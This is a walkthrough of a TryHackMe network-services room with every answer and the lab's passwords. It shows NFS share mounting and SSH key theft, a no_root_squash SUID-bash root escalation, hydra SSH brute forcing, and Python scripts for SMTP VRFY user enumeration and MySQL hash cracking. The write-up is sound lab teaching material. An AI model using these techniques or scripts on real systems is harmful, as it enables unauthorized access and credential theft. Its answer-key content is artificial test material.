In this article I have tried to prepare a write-up for the "Network Services 2" room on TryHackMe.


[Task 1] Get Connected

This room is a sequel to the first Network Services room. Similarly, it will explore a few more common network service vulnerabilities and misconfigurations that you're likely to find in CTFs and in some penetration testing exam scenarios.

#1 Ready? Let's get going!

ANSWER: No answer needed


[Task 2] Understanding NFS

NFS stands for "Network File System" and allows a system to share directories and files with others over a network. By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by mounting all, or a portion, of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.

#1 What does NFS stand for?

NFS stands for "Network File System" and allows a system to share directories and files with others over a network.

ANSWER: Network File System

#2 What process allows an NFS client to interact with a remote directory as though it was a physical device?

By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by "mounting" all, or a portion, of a file system on a server.

ANSWER: Mounting

#3 What does NFS use to represent files and directories on the server?

If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

  • The file handle
  • The name of the file to be accessed
  • The user's user ID
  • The user's group ID

ANSWER: file handle

#4 What protocol does NFS use to communicate between the server and client?

The mount service then acts to connect to the relevant mount daemon using RPC. Both the mount daemon (mountd) and the NFS daemon are ONC RPC services: a client first asks the portmapper (rpcbind, port 111) which port each program registered on, which is why port 111 turns up next to 2049 in the scan later on.

ANSWER: RPC
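
The RPC lookup just described, as an added example that is not part of the room or of this write-up: before a client can talk to mountd or nfsd it asks the portmapper which port each program registered on, and this script builds that PMAPPROC_GETPORT call and decodes the reply. The constants are the standard ONC RPC program numbers; the reply bytes at the bottom are constructed here (port 2049 is the value the parser pulls out of them), and getport_udp, which sends the call to a real host, is the only part that needs a network.

```python
# Added example (not from the room or write-up): build the ONC RPC call that
# showmount/mount send to the portmapper to find the NFS and mountd ports, and
# decode the reply. Only getport_udp touches the network.
import socket
import struct

PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT = 100000, 2, 3   # portmapper program, version, procedure
NFS_PROG, MOUNT_PROG = 100003, 100005                   # program numbers nfsd and mountd register under
IPPROTO_TCP, IPPROTO_UDP = 6, 17
MSG_CALL, MSG_REPLY = 0, 1
AUTH_NULL = 0


def build_getport(prog, vers, proto, xid=0x1234ABCD):
    """Encode a PMAPPROC_GETPORT call: RFC 5531 call header + RFC 1833 mapping args."""
    header = struct.pack(">IIIIII", xid, MSG_CALL, 2, PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT)
    cred = struct.pack(">II", AUTH_NULL, 0)   # opaque_auth: flavor, body length (empty)
    verf = struct.pack(">II", AUTH_NULL, 0)
    args = struct.pack(">IIII", prog, vers, proto, 0)  # port field is ignored by GETPORT
    return header + cred + verf + args


def parse_getport_reply(data, expected_xid):
    """Decode an accepted GETPORT reply; returns the port, 0 meaning 'not registered'."""
    xid, mtype, reply_stat = struct.unpack_from(">III", data, 0)
    if xid != expected_xid:
        raise ValueError("xid mismatch: reply does not belong to our call")
    if mtype != MSG_REPLY or reply_stat != 0:        # 0 = MSG_ACCEPTED
        raise ValueError("call was not accepted by rpcbind")
    _flavor, verf_len = struct.unpack_from(">II", data, 12)
    off = 20 + ((verf_len + 3) & ~3)                 # verifier body is padded to 4 bytes
    accept_stat, = struct.unpack_from(">I", data, off)
    if accept_stat != 0:                             # 0 = SUCCESS, 1 = PROG_UNAVAIL, ...
        raise ValueError("accept_stat %d" % accept_stat)
    port, = struct.unpack_from(">I", data, off + 4)
    return port


def getport_udp(host, prog, vers, proto=IPPROTO_TCP, timeout=3.0):
    """Ask rpcbind on UDP/111 which port a program listens on (needs network; not exercised offline)."""
    xid = 0x1234ABCD
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_getport(prog, vers, proto, xid), (host, 111))
        data, _ = s.recvfrom(4096)
    return parse_getport_reply(data, xid)


# Constructed reply, laid out as rpcbind would send it: xid, MSG_REPLY, MSG_ACCEPTED,
# AUTH_NULL verifier (flavor 0, length 0), SUCCESS, port 2049.
SAMPLE_REPLY = struct.pack(">IIIIIII", 0x1234ABCD, MSG_REPLY, 0, AUTH_NULL, 0, 0, 2049)

if __name__ == "__main__":
    call = build_getport(NFS_PROG, 3, IPPROTO_TCP)
    print("GETPORT call for nfs v3/tcp: %d bytes, %s" % (len(call), call.hex()))
    print("port in constructed reply:", parse_getport_reply(SAMPLE_REPLY, 0x1234ABCD))
    # Against a live target: getport_udp("10.10.x.x", MOUNT_PROG, 3)
```

The xid check matters more than it looks: rpcbind answers any client, so a UDP scanner that ignores the xid will happily pair a late reply with the wrong query.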

#5 What two pieces of user data does the NFS server take as parameters for controlling user permissions?

As in #3, the RPC call to NFSD carries the user's user ID and group ID alongside the file handle and file name; the server uses those two values to decide what the caller may do with the file.

ANSWER: user id / group id

#6 Can a Windows NFS server share files with a Linux client? (Y/N)

ANSWER: Y

#7 Can a Linux NFS server share files with a MacOS client? (Y/N)

ANSWER: Y

#8 What is the latest version of NFS?

You can find the answer on the website the room links to.

ANSWER: 4.2


[Task 3] Enumerating NFS

You can use this Nmap scan (-A already implies -sC, so the extra flag is harmless but redundant):

nmap -p- -A -sC -Pn [IP Address]

#1 Conduct a thorough port scan of your choosing, how many ports are open?

Ports 22, 111, 2049, 37069, 39969, 41047 and 48707 are open. 22 is SSH, 111 is the RPC portmapper (rpcbind), 2049 is NFS, and the four high ports are the other RPC services (such as mountd, nlockmgr and status) that registered with the portmapper; those are assigned at boot, so the high numbers will differ on your instance.

ANSWER: 7

#2 Which port contains the service we're looking to enumerate?

The nfs service is on port 2049 in the scan output above.

ANSWER: 2049

#3 Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

showmount asks mountd (via the portmapper) for the export list, so it works without mounting anything.

ANSWER: /home

#4 Change directory to where you mounted the share- what is the name of the folder inside?

Time to mount the share to our local machine!

First, use "mkdir /tmp/mount" to create a directory on your machine to mount the share to. This is in the /tmp directory, so be aware that it will be removed on restart.

Then mount the NFS share to your local machine with the mount command the room walks through: "sudo mount -t nfs [IP]:/home /tmp/mount -o nolock". Change into /tmp/mount and list it.

ANSWER: cappucino

#5 Have a look inside this directory, look at the files. Looks like we're inside a user's home directory...

ANSWER: No answer needed

#6 Which of these folders could contain keys that would give us remote access to the server?

ANSWER: .ssh

#7 Which of these keys is most useful to us?

ANSWER: id_rsa

#8 Can we log into the machine using ssh -i <key-file> <username>@<ip>? (Y/N)

Copy id_rsa somewhere local and run "chmod 600" on the copy first; ssh refuses a private key that other users can read. The username is the folder name from #4.

ANSWER: Y


[Task 4] Exploiting NFS

This attack relies on root squashing being disabled on the export (no_root_squash): when we, as root on our own machine, drop a root-owned SUID binary into the share, the file keeps its root owner and SUID bit on the server, and any user who can reach it there can execute it as root.

#1 First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user's home directory.

ANSWER: No answer needed

#2 The copied bash shell must be owned by a root user, you can set this using "sudo chown root bash"

The bash binary you copy in has to be built for the target's architecture and libc, or it will not start on the server.

ANSWER: No answer needed

#3 What letter do we use to set the SUID bit set using chmod?

ANSWER: s

#4 What does the permission set look like? Make sure that it ends with -sr-x.

Check it with "ls -l bash" from inside the share; the s in the owner and group execute positions is the SUID and SGID bit respectively.

ANSWER: -rwsr-sr-x

#5 The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.

Bash resets its effective UID to the real UID when the two differ unless it is started in privileged mode, so on the target (logged in over SSH as the user from Task 3) run "./bash -p" from the home directory.

ANSWER: No answer needed

#6 Great! If all's gone well you should have a shell as root! What's the root flag?

ANSWER: I'm sure you can find it in your own efforts 🙂


[Task 5] Understanding SMTP

#1 What does SMTP stand for?

SMTP stands for "Simple Mail Transfer Protocol".

ANSWER: Simple Mail Transfer Protocol

#2 What does SMTP handle the sending of?

ANSWER: emails

#3 What is the first step in the SMTP process?

The mail user agent, which is either your email client or an external program, connects to the SMTP server of your domain. This initiates the SMTP handshake.

ANSWER: SMTP handshake

#4 What is the default SMTP port?

This connection works over the SMTP port, which is usually 25.

ANSWER: 25

#5 Where does the SMTP server send the email if the recipient's server is not available?

If the recipient's server can't be accessed, or is not available, the email gets put into an SMTP queue.

ANSWER: smtp queue

#6 On what server does the email ultimately end up on?

ANSWER: POP/IMAP

#7 Can a Linux machine run an SMTP server? (Y/N)

SMTP server software is readily available on Windows server platforms, with many other variants of SMTP being available to run on Linux.

ANSWER: Y

#8 Can a Windows machine run an SMTP server? (Y/N)

Same reasoning as #7.

ANSWER: Y


[Task 6] Enumerating SMTP

Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!

#1 First, let's run a port scan against the target machine, same as last time. What port is SMTP running on?

ANSWER: 25

#2 Okay, now we know what port we should be targeting, let's start up Metasploit. What command do we use to do this?

ANSWER: msfconsole

#3 Let's search for the module "smtp_version", what's its full module name?

ANSWER: auxiliary/scanner/smtp/smtp_version

#4 Great, now- select the module and list the options. How do we do this?

ANSWER: options

#5 Have a look through the options, does everything seem correct? What is the option we need to set?

ANSWER: RHOSTS

#6 Set that to the correct value for your target machine. Then run the module. What's the system mail name?

The module connects to port 25 and records the 220 greeting the server sends; the hostname in that banner is the mail name.

ANSWER: polosmtp.home

#7 What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

The banner from #6 names the MTA; the room links a reference page if you want to read up on it.

ANSWER: Postfix

#8 Good! We've now got a good amount of information on the target system to move onto the next phase. Let's search for the module "smtp_enum", what's its full module name?

ANSWER: auxiliary/scanner/smtp/smtp_enum

#9 What option do we need to set to the wordlist's path?

ANSWER: USER_FILE

#10 Once we've set this option, what is the other essential parameter we need to set?

ANSWER: RHOSTS

#11 Now, set the THREADS parameter to 16 and run the module, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

smtp_enum sends VRFY (falling back to EXPN or RCPT TO when VRFY is disabled) for every name in the wordlist and keeps the ones the server does not reject; a Postfix server with VRFY enabled answers 252 for a real local user and 550 "User unknown" for anything else.

ANSWER: No answer needed

#12 Okay! Now that's finished, what username is returned?

ANSWER: administrator
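
The SMTP exchange from Task 5 (server greeting, then the client's HELO) and the VRFY probing that smtp_enum performs in #11, as an added example written for this write-up rather than taken from the room or from Metasploit. It runs offline: start_fake_server is a constructed stand-in for the target that greets with the banner host from #6 and admits only the user found in #12; smtp_enum is the client side. Pointed at a real host on port 25 the same client code does the banner grab and user enumeration, provided the server answers VRFY at all.

```python
# Added example (not from the room, the write-up or Metasploit): the SMTP
# dialogue behind smtp_version and smtp_enum, with a constructed fake server on
# 127.0.0.1 standing in for the target so the exchange runs offline.
import socket
import threading

BANNER_HOST = "polosmtp.home"     # mail name from the room's smtp_version output
KNOWN_USERS = {"administrator"}   # accounts the fake server admits exist


def _serve_one(conn):
    """Minimal Postfix-like server: 220 greeting, HELO/EHLO, VRFY (252 known / 550 unknown), QUIT."""
    conn.sendall(b"220 %s ESMTP Postfix (Ubuntu)\r\n" % BANNER_HOST.encode())
    buf = b""
    while True:
        chunk = conn.recv(1024)
        if not chunk:
            return
        buf += chunk
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            verb, _, arg = line.decode(errors="replace").partition(" ")
            verb, arg = verb.upper(), arg.strip()
            if verb in ("HELO", "EHLO"):
                conn.sendall(b"250 %s\r\n" % BANNER_HOST.encode())
            elif verb == "VRFY":
                if arg in KNOWN_USERS:
                    conn.sendall(b"252 2.0.0 %s\r\n" % arg.encode())
                else:
                    conn.sendall(b"550 5.1.1 <%s>: Recipient address rejected: "
                                 b"User unknown in local recipient table\r\n" % arg.encode())
            elif verb == "QUIT":
                conn.sendall(b"221 2.0.0 Bye\r\n")
                return
            else:
                conn.sendall(b"502 5.5.2 Error: command not recognized\r\n")


def start_fake_server():
    """Bind the fake server to an ephemeral localhost port; returns the listening socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed by the caller
                return
            with conn:
                _serve_one(conn)

    threading.Thread(target=loop, daemon=True).start()
    return srv


def _read_reply(f):
    """Read one SMTP reply, including the 250-continued multi-line form; returns (code, text)."""
    text = []
    while True:
        raw = f.readline()
        if not raw:
            raise RuntimeError("connection closed by server")
        line = raw.decode(errors="replace").rstrip("\r\n")
        text.append(line[4:])
        if len(line) < 4 or line[3] != "-":
            return int(line[:3]), "\n".join(text)


def smtp_enum(host, port, wordlist, helo="attacker"):
    """Grab the banner, then VRFY each candidate; returns (banner, [users the server confirmed])."""
    found = []
    with socket.create_connection((host, port), timeout=5) as s:
        f = s.makefile("rb")
        code, banner = _read_reply(f)      # the 220 greeting smtp_version reports
        if code != 220:
            raise RuntimeError("unexpected greeting: %d %s" % (code, banner))
        s.sendall(b"HELO %s\r\n" % helo.encode())
        _read_reply(f)
        for user in wordlist:
            s.sendall(b"VRFY %s\r\n" % user.encode())
            code, _ = _read_reply(f)
            if code in (250, 251, 252):    # 2xx = exists or forwarded; 550 = unknown
                found.append(user)
        s.sendall(b"QUIT\r\n")
    return banner, found


if __name__ == "__main__":
    srv = start_fake_server()
    banner, users = smtp_enum("127.0.0.1", srv.getsockname()[1], ["root", "administrator", "carl"])
    print("banner:", banner)
    print("valid users:", users)
    srv.close()
```

A server with disable_vrfy_command set answers 252 to every VRFY, which is why the 2xx check alone is not enough in the field and smtp_enum falls back to RCPT TO.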


[Task 7] Exploiting SMTP

#1 What is the password of the user we found during our enumeration phase?

You can use this command:

hydra -t 16 -l [USERNAME] -P [rockyou.txt location] -vV [Machine IP Address] ssh

ANSWER: alejandro

#2 Great! Now, let's SSH into the server as the user, what are the contents of smtp.txt

You can use this command, entering the password from #1 when prompted:

ssh administrator@[Machine IP Address]

ANSWER: I'm sure you can find it in your own efforts 🙂


[Task 8] Understanding MySQL

#1 What type of software is MySQL?

MySQL is a relational database management system (RDBMS) based on Structured Query Language (SQL).

ANSWER: relational database management system

#2 What language is MySQL based on?

It uses a language, specifically the Structured Query Language (SQL).

ANSWER: SQL

#3 What communication model does MySQL use?

As we know, it uses a client-server model.

ANSWER: client-server

#4 What is a common application of MySQL?

ANSWER: back end database

#5 What major social network uses MySQL as their back-end database? This will require further research.

ANSWER: Facebook


[Task 9] Enumerating MySQL

Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!

#1 What port is MySQL using?

ANSWER: 3306

#2 We can do this using the command "mysql -h [IP] -u [username] -p"

The room gives you the credentials for this step; -p with no value makes the client prompt for the password instead of leaving it in your shell history.

ANSWER: No answer needed

#3 Okay, we know that our login credentials work. Let's quit out of this session with "exit" and launch up Metasploit.

ANSWER: No answer needed

#4 Search for, select and list the options it needs. What three options do we need to set? (in descending order).

The module the room means here is auxiliary/admin/mysql/mysql_sql, which runs a single query with the supplied credentials.

ANSWER: PASSWORD/RHOSTS/USERNAME

#5 Run the module. By default it will test with the "select version()" command, what result does this give you?

ANSWER: 5.7.29-0ubuntu0.18.04.1

#6 Change the "sql" option to "show databases". How many databases are returned?

ANSWER: 4


[Task 10] Exploiting MySQL

#1 First, let's search for and select the "mysql_schemadump" module. What's the module's full name?

ANSWER: auxiliary/scanner/mysql/mysql_schemadump

#2 What's the name of the last table that gets dumped?

First, start the "mysql" service. Then open msfconsole, select the module, set its parameters (RHOSTS, USERNAME and PASSWORD, as in Task 9) and run it. The last table printed belongs to the sys schema.

ANSWER: x$waits_global_by_latency

#3 Search for and select the "mysql_hashdump" module. What's the module's full name?

ANSWER: auxiliary/scanner/mysql/mysql_hashdump

#4 Once again, I'll let you take it from here. Set the relevant options, run the module. What non-default user stands out to you?

ANSWER: carl

#5 What is the user/hash combination string?

The leading * marks a mysql_native_password hash: SHA1 of the SHA1 of the password, in upper-case hex.

ANSWER: carl:*EA031893AA21444B170FC2162A56978B8CEECE18

#6 Now, we need to crack the password! Let's try John the Ripper against it using: "john hash.txt" what is the password of the user we found?

Save the combination string from #5 as hash.txt. John recognises the mysql-sha1 format from the leading *; add --format=mysql-sha1 and a --wordlist if you want to be explicit.

ANSWER: doggie
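
What the hash in #5 is and what john does with it in #6, as an added example that is not part of the room or of John the Ripper: mysql_native_password (the scheme MySQL 5.7 uses) stores "*" followed by the upper-case hex of SHA1(SHA1(password)), so cracking is a matter of hashing each candidate and comparing. carl's line is the one from the hashdump above; the second account and the four-word wordlist are constructed stand-ins for a real dump and rockyou.txt.

```python
# Added example (not from the room or write-up): the mysql_native_password
# hash format and a small wordlist attack against a hashdump, which is what
# "john hash.txt" does at scale.
import hashlib


def mysql_native_password(password):
    """Hash a password the way MySQL 4.1+ (including 5.7) stores it for mysql_native_password."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()   # binary digest, not its hex form
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_hashdump_line(line):
    """'user:*HASH' as printed by mysql_hashdump -> (user, hash); an empty hash means no password set."""
    user, _, h = line.strip().partition(":")
    return user, h.strip().upper()


def crack(target_hash, wordlist):
    """Return the first candidate whose hash matches, or None (john's default wordlist mode)."""
    target = target_hash.upper()
    if not (target.startswith("*") and len(target) == 41):
        raise ValueError("not a mysql_native_password hash: %r" % target_hash)
    for word in wordlist:
        if mysql_native_password(word) == target:
            return word
    return None


def crack_dump(lines, wordlist):
    """Run crack() over every hashdump line; users with an empty hash are reported as None."""
    results = {}
    for line in lines:
        user, h = parse_hashdump_line(line)
        results[user] = crack(h, wordlist) if h else None
    return results


# Constructed dump: carl's entry is the room's; "app" is made up and uses a password not in the list.
SAMPLE_DUMP = [
    "carl:*EA031893AA21444B170FC2162A56978B8CEECE18",
    "app:" + mysql_native_password("Winter-2020-Not-In-List"),
]
SAMPLE_WORDLIST = ["123456", "password", "doggie", "letmein"]   # stand-in for rockyou.txt

if __name__ == "__main__":
    for user, pw in crack_dump(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print("%s: %s" % (user, pw if pw else "not cracked"))
```

Two unsalted SHA1 rounds are why this format falls so quickly: every candidate costs the same for every user, so one pass over the wordlist cracks the whole dump at once.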

#7 What's the contents of MySQL.txt

ANSWER: I'm sure you can find it in your own efforts 🙂


[Task 11] Further Learning

#1 Congratulations! You did it!

ANSWER: No answer needed


So far, I have tried to explain the solutions to the questions in as much detail as I can. I hope it helped you. See you in my next write-ups.